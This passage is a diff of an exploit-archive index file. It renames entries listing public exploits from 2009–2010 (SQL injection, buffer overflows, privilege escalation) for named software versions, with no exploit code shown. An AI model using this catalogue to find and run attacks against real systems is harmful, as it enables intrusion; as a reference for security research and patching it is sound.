+7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0 7713,platforms/windows/local/7713.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (2)",2009-01-09,Houssamix,windows,local,0 7714,platforms/windows/local/7714.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (1)",2009-01-11,sCORPINo,windows,local,0 7715,platforms/windows/local/7715.py,"VUPlayer 2.49 - '.asx' (HREF) Universal Buffer Overflow",2009-01-11,His0k4,windows,local,0 @@ -7414,7 +7414,7 @@ id,file,description,date,author,platform,type,port 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0 -7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21 +7875,platforms/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0 @@ -7540,7 +7540,7 @@ id,file,description,date,author,platform,type,port 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0 8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - (frame.php id) Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0 -8008,platforms/hardware/dos/8008.txt,"Netgear embedded Linux for the SSL312 router - Denial of Service",2009-02-09,Rembrandt,hardware,dos,0 +8008,platforms/hardware/dos/8008.txt,"Netgear SSL312 Router - Denial of Service",2009-02-09,Rembrandt,hardware,dos,0 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0 8010,platforms/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local,0 8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0 @@ -7694,7 +7694,7 @@ id,file,description,date,author,platform,type,port 8170,platforms/php/webapps/8170.txt,"nForum 1.5 - Multiple SQL Injections",2009-03-09,"Salvatore Fresta",php,webapps,0 8171,platforms/windows/local/8171.py,"Nokia MultiMedia Player 1.0 - (Playlist) Universal Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 8172,platforms/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0 -8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus UPS-Service - Buffer Overflow",2009-03-09,Elazar,windows,remote,0 +8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,windows,remote,0 8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - (mksmonen.sys) Privilege Escalation",2009-03-09,"NT Internals",windows,local,0 8176,platforms/windows/local/8176.py,"EO Video 1.36 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 @@ -7730,8 +7730,8 @@ id,file,description,date,author,platform,type,port 8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - (MrvBarCd.dll) Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0 8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Authentication Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0 8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0 -8211,platforms/windows/remote/8211.pl,"Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0 -8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0 +8211,platforms/windows/remote/8211.pl,"Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0 +8212,platforms/windows/dos/8212.pl,"Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0 8213,platforms/windows/dos/8213.pl,"VideoLAN VLC Media Player 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow (multi target)",2009-03-16,SimO-s0fT,windows,local,0 8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0 @@ -7808,7 +7808,7 @@ id,file,description,date,author,platform,type,port 8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - (SQL Injection / Remote File Inclusion) Multiple Vulnerabilities",2009-03-26,SirGod,php,webapps,0 8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0 -8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - (NLST) Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos,0 +8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos,0 8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 @@ -8158,7 +8158,7 @@ id,file,description,date,author,platform,type,port 8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0 8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0 8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0 -8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - (ABORT) Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0 +8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0 8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure",2009-05-11,Cyber-Zone,windows,remote,0 8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,php,webapps,0 @@ -8395,7 +8395,7 @@ id,file,description,date,author,platform,type,port 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0 8896,platforms/osx/local/8896.c,"Apple Mac OSX xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0 -8897,platforms/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 +8897,platforms/windows/remote/8897.c,"httpdx 0.8 FTP Server - Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 8898,platforms/php/webapps/8898.txt,"Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",php,webapps,0 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0 8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) SQL Injection",2009-06-08,snakespc,php,webapps,0 @@ -8771,7 +8771,7 @@ id,file,description,date,author,platform,type,port 9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 -9295,platforms/windows/dos/9295.txt,"Firebird SQL - op_connect_request main listener shutdown",2009-07-28,"Core Security",windows,dos,0 +9295,platforms/windows/dos/9295.txt,"Firebird SQL - op_connect_request main listener shutdown Exploit",2009-07-28,"Core Security",windows,dos,0 9296,platforms/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities",2009-07-28,"Aung Khant",php,webapps,0 9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion",2009-07-28,NoGe,php,webapps,0 9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (update)",2009-07-30,corelanc0d3r,windows,local,0 @@ -8946,7 +8946,7 @@ id,file,description,date,author,platform,type,port 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps,0 9476,platforms/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,windows,local,0 9477,platforms/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Privilege Escalation",2009-08-18,Zinx,android,local,0 -9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80 +9478,platforms/windows/dos/9478.pl,"BugHunter HTTP Server 1.6.2 - 'httpsv.exe' (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 @@ -9475,7 +9475,7 @@ id,file,description,date,author,platform,type,port 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",windows,dos,80 10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - (jar50.dll) Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0 -10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command Denial of Service",2009-11-13,zhangmc,windows,dos,21 +10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service",2009-11-13,zhangmc,windows,dos,21 10105,platforms/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 40083,platforms/php/webapps/40083.txt,"WordPress Plugin Activity Log 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80 @@ -9530,7 +9530,7 @@ id,file,description,date,author,platform,type,port 10220,platforms/php/webapps/10220.txt,"pointcomma 3.8b2 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service",2009-11-24,leinakesi,windows,dos,21 10222,platforms/php/webapps/10222.txt,"W3infotech - (Authentication Bypass) SQL Injection",2009-11-24,ViRuS_HiMa,php,webapps,0 -10223,platforms/windows/dos/10223.txt,"TYPSoft 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,windows,dos,21 +10223,platforms/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,windows,dos,21 10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Buffer Overflow",2009-11-25,Rick2600,windows,local,0 @@ -10029,7 +10029,7 @@ id,file,description,date,author,platform,type,port 10817,platforms/php/webapps/10817.txt,"Joomla! Component com_airmonoblock - Blind SQL Injection",2009-12-30,Pyske,php,webapps,0 10819,platforms/asp/webapps/10819.txt,"gallery_show.asp - GID Blind SQL Injection",2009-12-30,R3d-D3V!L,asp,webapps,0 10820,platforms/php/dos/10820.sh,"Joomla! Component Core 1.5.x com_ - Denial of Service",2009-12-31,emgent,php,dos,80 -10821,platforms/multiple/webapps/10821.txt,"WingFTP Server 3.2.4 - Cross-Site Request Forgery",2009-12-30,Ams,multiple,webapps,0 +10821,platforms/multiple/webapps/10821.txt,"Wing FTP Server 3.2.4 - Cross-Site Request Forgery",2009-12-30,Ams,multiple,webapps,0 10822,platforms/php/webapps/10822.txt,"Joomla! Component com_rd_download - Local File Disclosure",2009-12-30,FL0RiX,php,webapps,0 10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure",2009-12-30,LionTurk,asp,webapps,0 10824,platforms/php/webapps/10824.txt,"K-Rate - SQL Injection",2009-12-30,e.wiZz,php,webapps,0 @@ -10169,7 +10169,7 @@ id,file,description,date,author,platform,type,port 11043,platforms/hardware/dos/11043.txt,"Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 11044,platforms/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service (PoC)",2010-01-06,"Pietro Oliva",linux,dos,0 11045,platforms/php/webapps/11045.txt,"SpawCMS Editor - Arbitrary File Upload",2010-01-06,j4ck,php,webapps,0 -11046,platforms/windows/local/11046.py,"Quick Player 1.2 -Unicode BoF - bindshell",2010-01-06,sinn3r,windows,local,0 +11046,platforms/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (Bindshell)",2010-01-06,sinn3r,windows,local,0 11047,platforms/php/webapps/11047.txt,"Zeeways Technology - 'product_desc.php' SQL Injection",2010-01-07,Gamoscu,php,webapps,0 11048,platforms/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - ladder.php SQL Injection",2010-01-07,Sora,php,webapps,0 11051,platforms/php/webapps/11051.txt,"AutoIndex PHP Script - 'index.php' Directory Traversal",2010-01-07,Red-D3v1L,php,webapps,0 @@ -10388,7 +10388,7 @@ id,file,description,date,author,platform,type,port 11325,platforms/php/webapps/11325.txt,"RealAdmin - 'detail.php' Blind SQL Injection",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0 11326,platforms/php/webapps/11326.txt,"cityadmin - 'links.php' Blind SQL Injection",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0 11327,platforms/php/webapps/11327.txt,"myBusinessAdmin - 'content.php' Blind SQL Injection",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0 -11328,platforms/windows/remote/11328.py,"UplusFtp Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0 +11328,platforms/windows/remote/11328.py,"UplusFTP Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0 11329,platforms/php/webapps/11329.txt,"MASA2EL Music City 1.0 - SQL Injection",2010-02-04,alnjm33,php,webapps,0 11330,platforms/windows/webapps/11330.txt,"ManageEngine OpUtils 5 - 'Login.DO' SQL Injection",2010-02-04,"Asheesh Anaconda",windows,webapps,0 11331,platforms/windows/local/11331.txt,"Ipswitch IMAIL 11.01 - Reversible Encryption + weak ACL",2010-02-04,sinn3r,windows,local,0 @@ -10492,7 +10492,7 @@ id,file,description,date,author,platform,type,port 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' Local Denial of Service (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0 -11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 +11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow (calc.exe)",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) - SQL Injection",2010-02-15,10n1z3d,php,webapps,0 11457,platforms/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add Exploit)",2010-02-15,"Sioma Labs",windows,remote,0 @@ -10505,9 +10505,9 @@ id,file,description,date,author,platform,type,port 11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 - Local Buffer Overflow",2010-02-15,_SuBz3r0_,windows,local,0 11466,platforms/php/webapps/11466.txt,"microUpload - Arbitrary File Upload",2010-02-15,Phenom,php,webapps,0 11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote Denial of Service",2010-02-15,"Jason Bowes",ios,dos,0 -11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow",2010-02-15,dookie,windows,remote,21 -11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0 -11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0 +11468,platforms/windows/remote/11468.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow",2010-02-15,dookie,windows,remote,21 +11469,platforms/windows/dos/11469.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0 +11470,platforms/windows/dos/11470.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0 11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,ios,dos,0 11473,platforms/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,php,webapps,0 11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews - [id] SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0 @@ -10535,7 +10535,7 @@ id,file,description,date,author,platform,type,port 11497,platforms/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",linux,remote,0 11498,platforms/php/webapps/11498.txt,"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion",2010-02-18,"S2 Crew",php,webapps,0 11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos,0 -11500,platforms/windows/remote/11500.py,"Easy~Ftp Server 1.7.0.2 - (HTTP) Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",windows,remote,0 +11500,platforms/windows/remote/11500.py,"EasyFTP Server 1.7.0.2 - (HTTP) Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",windows,remote,0 11502,platforms/php/webapps/11502.txt,"phpAutoVideo - Cross-Site Request Forgery",2010-02-19,GoLdeN-z3r0,php,webapps,0 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,php,webapps,0 11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL Injection",2010-02-19,Ariko-Security,php,webapps,0 @@ -10565,12 +10565,12 @@ id,file,description,date,author,platform,type,port 11535,platforms/windows/dos/11535.pl,"Media Player Classic 6.4.9.1 - '.avi' Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0 11536,platforms/windows/dos/11536.pl,"GOM Player 2.1.21.4846 - '.wav' Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0 11537,platforms/windows/dos/11537.pl,"Chasys Media Player 1.1 - '.mid' Local Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0 -11539,platforms/windows/remote/11539.py,"Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0 +11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0 11540,platforms/windows/dos/11540.pl,"E.M. Total Video Player 1.31 - '.wav' Local Crash",2010-02-22,v3n0m,windows,dos,0 11541,platforms/windows/dos/11541.pl,"E.M. Total Video Player 1.31 - '.avi' Local Crash (PoC)",2010-02-22,diving,windows,dos,0 11543,platforms/php/webapps/11543.txt,"Softbiz Jobs - Cross-Site Request Forgery",2010-02-23,"pratul agrawal",php,webapps,0 11544,platforms/php/webapps/11544.php,"Joomla! Component com_ice - Blind SQL Injection",2010-02-23,snakespc,php,webapps,0 -11546,platforms/hardware/dos/11546.py,"iPhone - FTP Server (WiFi FTP) by SavySoda Denial of Service/PoC",2010-02-23,b0telh0,hardware,dos,0 +11546,platforms/hardware/dos/11546.py,"iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service/PoC",2010-02-23,b0telh0,hardware,dos,0 11547,platforms/php/webapps/11547.txt,"PHP Auktion Pro SQL - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps,0 11548,platforms/php/webapps/11548.txt,"Top Auktion - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps,0 11549,platforms/php/webapps/11549.pl,"Joomla! Component user_id com_sqlreport - Blind SQL Injection",2010-02-23,snakespc,php,webapps,0 @@ -10663,7 +10663,7 @@ id,file,description,date,author,platform,type,port 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - 'index.php' 'id' SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Privilege Escalation",2010-03-07,kingcope,multiple,local,0 -11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' crash",2010-03-07,l3D,windows,dos,0 +11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit",2010-03-07,l3D,windows,dos,0 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' - 'id' news.php SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR 2.0 - Local File Inclusion",2010-03-08,"cr4wl3r ",php,webapps,0 11656,platforms/windows/local/11656.py,"QuickZip 4.x - '.zip' Local Universal Buffer Overflow (PoC)",2010-03-08,"corelanc0d3r and mr_me",windows,local,0 @@ -10674,7 +10674,7 @@ id,file,description,date,author,platform,type,port 11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0 11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re_ R4vax",php,webapps,0 11667,platforms/php/webapps/11667.txt,"Joomla! Component com_hezacontent 1.0 - 'id' SQL Injection",2010-03-09,kaMtiEz,php,webapps,0 -11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0 +11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0 11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - (argument) Local Crash",2010-03-09,l3D,windows,dos,0 11670,platforms/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0 11671,platforms/php/webapps/11671.txt,"mhproducts Kleinanzeigenmarkt - search.php SQL Injection",2010-03-09,"Easy Laster",php,webapps,0 @@ -10805,15 +10805,15 @@ id,file,description,date,author,platform,type,port 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusion",2010-03-18,"cr4wl3r ",php,webapps,0 11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 -11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21 -11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 -11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0 +11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP Server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21 +11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 +11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php Exploit",2010-03-19,"Easy Laster",php,webapps,0 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,php,webapps,0 11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 11815,platforms/php/webapps/11815.txt,"Joomla! Component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - (id_auk) auktion.php Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0 11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0 -11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0 +11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric 